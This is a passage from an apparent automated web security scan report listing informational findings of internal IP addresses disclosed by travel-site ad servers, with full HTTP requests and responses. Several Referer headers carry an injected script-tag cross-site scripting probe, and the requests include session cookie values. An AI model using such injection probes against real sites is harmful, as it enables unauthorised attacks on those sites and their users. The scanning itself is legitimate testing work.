Cookie: JSESSIONID=26986A4704F854DBAA5915B151FBE488.p0528

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=E3F306C19851140C349EA0BB4E73716B.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Content-Length: 1291
Connection: close
Content-Type: image/gif

GIF89a|.......A#.2..............K8....=8. ..6..+..*.....%..=..I.."..XQ.@;.).,.......K1.)    .    .....~m.9 .!..2..9..:..J8.B@.E).9..?".;&.B%.;..#........ ..!.....5..I&.3..D&.9%.=%.+..=........I(.&........
...[SNIP]...

23.55. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.8.5.61

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E7500CA14FDE215C024D31D0E17145B0.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=C48818E7B47F8EDDDEDEE13932368B50.p0527; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.61
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:49 GMT
Via: 1.1 (Service Gateway)
Content-Length: 1291
Connection: close
Content-Type: image/gif

GIF89a|.......A#.2..............K8....=8. ..6..+..*.....%..=..I.."..XQ.@;.).,.......K1.)    .    .....~m.9 .!..2..9..:..J8.B@.E).9..?".;&.B%.;..#........ ..!.....5..I&.3..D&.9%.=%.+..=........I(.&........
...[SNIP]...

23.56. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.8.5.62

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=96CD86B744253E4B0A2E3CFE8BABE276.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=26986A4704F854DBAA5915B151FBE488.p0528; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.62
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 513


function setupLargeBottomHPU(drfAd) {    
   var advertiserRenderer = new AdvertiserRenderer(drfAd);
   var configurer = new WidgetInitializer(drfAd, advertiserRenderer);
   configurer.setup(9, 742, "TVLY
...[SNIP]...

23.57. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.8.5.56

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=42D836FDA1F37A442DDD521D91ED4575.p0529

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=E7500CA14FDE215C024D31D0E17145B0.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:49 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 513


function setupLargeBottomHPU(drfAd) {    
   var advertiserRenderer = new AdvertiserRenderer(drfAd);
   var configurer = new WidgetInitializer(drfAd, advertiserRenderer);
   configurer.setup(9, 742, "TVLY
...[SNIP]...

23.58. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.8.5.55

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=357224176254982816ECFF34448E5D96.p0521

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
SERVICE_HOST: 10.8.5.55
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:49 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 6336

#drf_popunderHPU {
   color: #000000;
   background-color: #f3ae07;
   background: #ffffff;
   width: 300px;
   height:600px;
   font-family: calibri, arial, sans-serif;
   text-align: left;
   font-size: 13p
...[SNIP]...

23.59. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.8.5.57

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=96CD86B744253E4B0A2E3CFE8BABE276.p0525

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=C1A177F6DDA538A9AC81F0BDDD440587.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/css
Content-Length: 6336

#drf_popunderHPU {
   color: #000000;
   background-color: #f3ae07;
   background: #ffffff;
   width: 300px;
   height:600px;
   font-family: calibri, arial, sans-serif;
   text-align: left;
   font-size: 13p
...[SNIP]...

23.60. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.8.5.59

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyyc880d--%3E%3Cscript%3Ealert(1)%3C/script%3Ee0acc4fd6b7&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=26986A4704F854DBAA5915B151FBE488.p0528

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=B4C607FC9EB01F6D0BC7B2C44D414F30.p0525; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.59
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 01:22:20 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 13952


function WidgetInitializer(drfAd, advertiserRenderer) {
   this.drfAd = drfAd;
   this.advertiserRenderer = advertiserRenderer;
}

WidgetInitializer.prototype.setup = function (advertisersNumber, w
...[SNIP]...

23.61. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.8.5.56

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C48818E7B47F8EDDDEDEE13932368B50.p0527

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
Cache-Control: max-age=1800, public
Expires: Mon, 03 Oct 2011 00:38:50 GMT
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 13952


function WidgetInitializer(drfAd, advertiserRenderer) {
   this.drfAd = drfAd;
   this.advertiserRenderer = advertiserRenderer;
}

WidgetInitializer.prototype.setup = function (advertisersNumber, w
...[SNIP]...

23.62. http://media.expedia.com/ads/travelhook/travelhook.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.expedia.com
Path:   /ads/travelhook/travelhook.js

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /ads/travelhook/travelhook.js HTTP/1.1
Host: media.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
ntCoent-Length: 25962
Content-Type: application/x-javascript
Last-Modified: Tue, 28 Jun 2011 22:31:55 GMT
Accept-Ranges: bytes
ETag: "80ffa2fe335cc1:405"
Server: Microsoft-IIS/6.0
Content-Length: 25962
Vary: Accept-Encoding
Cache-Control: max-age=900
Date: Mon, 03 Oct 2011 00:12:58 GMT
Connection: close

try
{

var th_StaticStart = new Date();
var thsver = '6.59';
var thsrn = Math.floor(Math.random() * 1000000);
var th_domain = 'extras.expedia.com';

function getEndvrTUID()
{

...[SNIP]...
   Pages["HTX_LOGIN"] = th_domain + "/Offers/js/LoginScrape.js?thsads=false";

}

       // Sams Club
if (document.URL.indexOf("travel.samsclub.com") >= 0 ||
document.URL.indexOf("10.95.13.23") >
...[SNIP]...
&pn=Confirmation";    
       Pages["HTX_ITNHEAD_STD"] = th_domain + "/Delivery/scrape.aspx?cid=1&pn=TripItinerary";    
    }
    else if (document.URL.indexOf("aarp") >= 0 ||
    document.URL.indexOf("10.96.73.221") >
...[SNIP]...

23.63. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.186.82.5

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=RCoxODUuMC4wLmkxJTNBMTE0LjEuMCUzQTEyNC4xLjAuaTElM0ExMDMuNC4xLmk2JTNBMTcxLjEuMCUzQTEzMC4xLjEuaTIlM0E0OC4xLjAlM0E5Ny43My4xLmkzJTNBOTguNi40JTNBMTQyLjAuMC5pNCUzQTE5OC4yLjAlM0ExNDUuMC4wLmkyJTNBMjAwLjAuMCUzQTEzNy4wLjAuaTIlM0ExMDguMS4wLmkyJTNBMTkwLjMuMCUzQTE1Mi4wLjAuaTIlM0ExMzQuMC4xJTNBMTk2LjEuMCUzQTIuMi4xJTNBMjA5LjAuMSUzQTE0Ny42LjAuaTYlM0E5Mi4wLjAuaTElM0ExMjEuNTAzLjAuaTclM0ExMzIuMi4wLmkyJTNBMTIyLjEuMC5pMyUzQTEzOC4xLjAlM0ExNDkuMC4wLmkxJTNBMTA0LjAuMSUzQTE5NS4wLjAlN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:35 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe004:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:02:35 GMT
Pragma: no-cache
Content-Length: 1275
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE&tile=1bf1ec91-3b26-460b-94f6-b81376aa7784&ip=10.186.82.5 -->
...[SNIP]...

23.64. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.186.82.5

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=RCoxODUuMC4wLmkxJTNBMTE0LjEuMCUzQTEyNC4xLjAuaTElM0ExMDMuNC4xLmk2JTNBMTcxLjEuMCUzQTEzMC4xLjEuaTIlM0E0OC4xLjAlM0E5Ny43My4xLmkzJTNBOTguNi40JTNBMTQyLjAuMC5pNCUzQTE5OC4yLjAlM0ExNDUuMC4wLmkyJTNBMjAwLjAuMCUzQTEzNy4wLjAuaTIlM0ExMDguMS4wLmkyJTNBMTkwLjMuMCUzQTE1Mi4wLjAuaTIlM0ExMzQuMC4xJTNBMTk2LjEuMCUzQTIuMi4xJTNBMjA5LjAuMSUzQTE0Ny42LjAuaTYlM0E5Mi4wLjAuaTElM0ExMjEuNTAzLjAuaTclM0ExMzIuMi4wLmkyJTNBMTIyLjEuMC5pMyUzQTEzOC4xLjAlM0ExNDkuMC4wLmkxJTNBMTA0LjAuMSUzQTE5NS4wLjAlN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:28 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe002:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:00:28 GMT
Pragma: no-cache
Content-Length: 538
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE&tile=7209306a-7609-423e-8e79-d6a540b0efaf&ip=10.186.82.5 -->
...[SNIP]...

23.65. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
